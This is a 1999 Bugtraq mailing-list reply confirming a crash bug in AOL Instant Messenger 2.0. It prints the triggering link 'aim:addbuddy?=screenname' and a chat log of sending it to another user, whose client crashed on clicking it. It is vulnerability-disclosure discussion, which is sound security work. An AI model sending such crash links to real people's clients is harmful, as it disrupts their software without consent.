Bugtraq mailing list archives
Re: AOL Instant Messenger URL Crash
From: djr () NARNIA N ML ORG (Daniel Reed)
Date: Tue, 20 Apr 1999 16:24:02 -0400
On Mon, 19 Apr 1999, Adam Brown wrote:
) There is a bug in the newer versions of AOL's Instant Messenger that will
) cause the client to crash when exploited. All builds of version 2.0 that
) I've tested seem to be vulnerable, although I have not done extensive
) version testing. AOL was notified of this about two weeks ago. To exploit
) this bug, send a hyperlink in this format: aim:addbuddy?=screenname

I just sent
<a href="aim:addbuddy?=screenname">what does this show up as</a>?
to an AOL AIM 2.0.996 user and once she *clicked* on it AIM crashed. I don't know if you meant to say that the user had to click on it for the client to crash, or if this is indeed different behaviour.

I also just tried it with "screenname" replaced with first her screenname, and then with mine, again with no automatic reaction.

(sent from linuxkitty, a naim-0.9.4-parse2 user, to <victim>, an AOL AIM 2.0.996 user)
[15:59:43] linuxkitty: [LINK:href="aim:addbuddy?=screenname":what does this show up as]?
[16:00:23] Friend <victim> has just logged off :(
[16:03:09] Friend <victim> is now online =)
[16:14:14] linuxkitty: [LINK:href="aim:addbuddy?=<victim>":miaow miaow] (don't click on that, I'm just testing something)
[16:14:50] linuxkitty: [LINK:href="aim:addbuddy?=linuxkitty":another test...]

--
Daniel Reed <n () ml org>
Many a false step is made by standing still...